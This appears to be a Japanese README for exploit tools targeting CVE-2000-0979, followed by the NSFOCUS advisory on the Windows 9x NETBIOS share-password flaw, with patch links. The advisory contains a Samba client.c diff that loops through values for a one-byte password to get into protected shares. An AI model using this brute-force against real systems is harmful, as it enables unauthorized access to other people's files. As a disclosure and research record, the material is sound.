
CVE-2000-0979
CVE-2000-0979.rb は、Windows 95 の SMB サービスに対する CVE-2000-0979 のエクスプロイトを行うスタンドアロンツールです。
msf_2000_0979.rb は Metasploit モジュールです。これを metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb にコピーできます。

詳細なドキュメントは近日公開予定です!
NSFOCUS セキュリティアドバイザリ (SA2000-05)
トピック: Microsoft Windows 9x NETBIOS パスワード検証の脆弱性
リリース日: 2000年8月24日 更新日: 2000年10月11日
Microsoft Windows 9x の NETBIOS プロトコル実装で使用されるパスワード検証方式に脆弱性が存在します。この脆弱性により、任意のユーザーがパスワード保護された Windows 9x のファイル共有サービスにアクセスできるようになります。攻撃者は共有パスワードを知る必要はありません。
Microsoft Windows 9x システムの共有リソースを保護するためにパスワードを設定することができます。しかし、Microsoft Windows 9x の NETBIOS プロトコル実装で使用されるパスワード検証方式に脆弱性が存在します。パスワードを検証する際、パスワードの長さはクライアントからサーバーに送信されるデータの長さに依存します。つまり、クライアントがパスワードの長さを1バイトに設定し、平文のパスワードを含むパケットをサーバーに送信すると、サーバーは共有パスワード(平文)の最初の1バイトのみと比較し、一致すれば検証プロセスが完了します。攻撃者は被害者のパスワードの最初の1バイトを推測して試すだけで済みます。Windows 9x のリモート管理システムも同じ共有パスワード認証方式を採用しているため影響を受けます。
このバグを示す簡単な例を以下に示します。 Get samba source package and modify source/client/client.c like this:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Microsoft のファイルとプリンタの共有サービスを閉じる。
Microsoft はこの問題について通知を受けており、この欠陥に関するセキュリティ情報を公開しています。
情報は以下で公開されています:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
パッチは以下から入手可能です:
. Microsoft Windows 95
パッチは近日公開予定
. Microsoft Windows 98 and 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
提供される情報は、NSFOCUS によって「現状のまま」提供され、いかなる種類の保証も行われません。NSFOCUS は、商品性の保証を除き、明示的または黙示的なすべての保証を否認します。いかなる場合においても、NSFOCUS は、直接的、間接的、付随的、結果的損害、事業利益の損失、特別損害を含む一切の損害について、たとえ NSFOCUS がそのような損害の可能性について知らされていたとしても、責任を負わないものとします。情報の配布または複製は、アドバイザリが一切変更されていないことを条件とします。
Copyright 1999-2000 NSFOCUS. All Rights Reserved. 利用規約。
NSFOCUS セキュリティチーム [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)